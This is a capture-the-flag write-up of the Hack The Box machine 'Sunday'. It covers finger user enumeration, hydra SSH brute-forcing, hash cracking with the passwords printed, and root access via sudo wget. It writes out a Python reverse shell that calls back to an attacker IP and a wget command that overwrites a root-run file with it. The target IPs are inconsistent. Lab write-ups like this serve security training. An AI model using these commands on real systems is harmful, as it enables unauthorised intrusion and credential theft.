Open in app

Sign in

Write

Sign in

SUNDAY

Burak Dirlik
4 min read4 days ago

--

Target ip is 10.129.32.188 Lets start.


nmap -sC -sV -O -T4 -oN nmap.txt 10.129.32.188

Lets make more comprehensive scan for found ports, but nothing changed.

nmap -p 79,111,515 -sV -oA full-scripts 10.129.32.188

Port 79 is running finger service.

Firstly, we check if there are any logged in users.

I look at pentestmonkey if there is something related to finger service.

There is user enumeration tool named finger-user-enum.

Usage:

./finger-user-enum.pl -U /home/kali/Downloads/Seclist-master/Usernames/Names/names.txt -t 10.129.32.168

Now we can compare the results of finger for a name that exists and one that doesn’t:

Since we have no indication of a password, we can try brute-force to SSH with the following command:

hydra -V -I -l sunny -P '/usr/share/wordlists/rockyou.txt' 10.129.32.188 ssh -s 22022

We got some credentials end of the brute force.

sunny:sunday

SSH connection:

ssh -p 22022 sunny@10.129.32.188

I can not see user.txt we need to privilege escalation.

But I can see /etc/passwd There are some hashes for sammy and sunny.

We need to crack these hashes to see passwords. I am using hashcat.

We got passwords

sammy:cooldude!
sunny:sunday

I can see user.txt with sammy user now.

Lets see which commands we can run as root.”

We observe the following results from the sudo -l command:

  • The user Sunny has permission to execute the /root/troll file with root privileges.
  • The user Sammy can overwrite any file owned by root using the wget command.

To exploit this, we’ll leverage Sammy’s sudo privileges to overwrite the /root/troll file and insert a shell into it. Then, using Sunny's sudo privileges, we'll execute the /root/troll file to escalate our shell to a root shell.

Target IP: 10.10.10.76
Attacker IP: 10.10.16.3 --> we added to shell.py

shell.py:

#!/usr/bin/python

import socket
import subprocess
import os

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.3", 444))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
p=subprocess.call(["/bin/sh", "-i"])

Executed command at Sammy user: (it overwrite /root/troll as shell.py)

sudo wget http://10.10.16.3:4444/shell.py -O /root/troll

Sammy user:

sudo /root/troll

We have to run these commands one after the other. Because the /root/troll file is resetted to original itself every 5 seconds. Therefore, we should be fast to obtain the shell. After that shell dropped to netcat as a root user and we got root flag.

--

--

Burak Dirlik

Written by Burak Dirlik

11 Followers

Computer Engineer & Penetration Tester

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams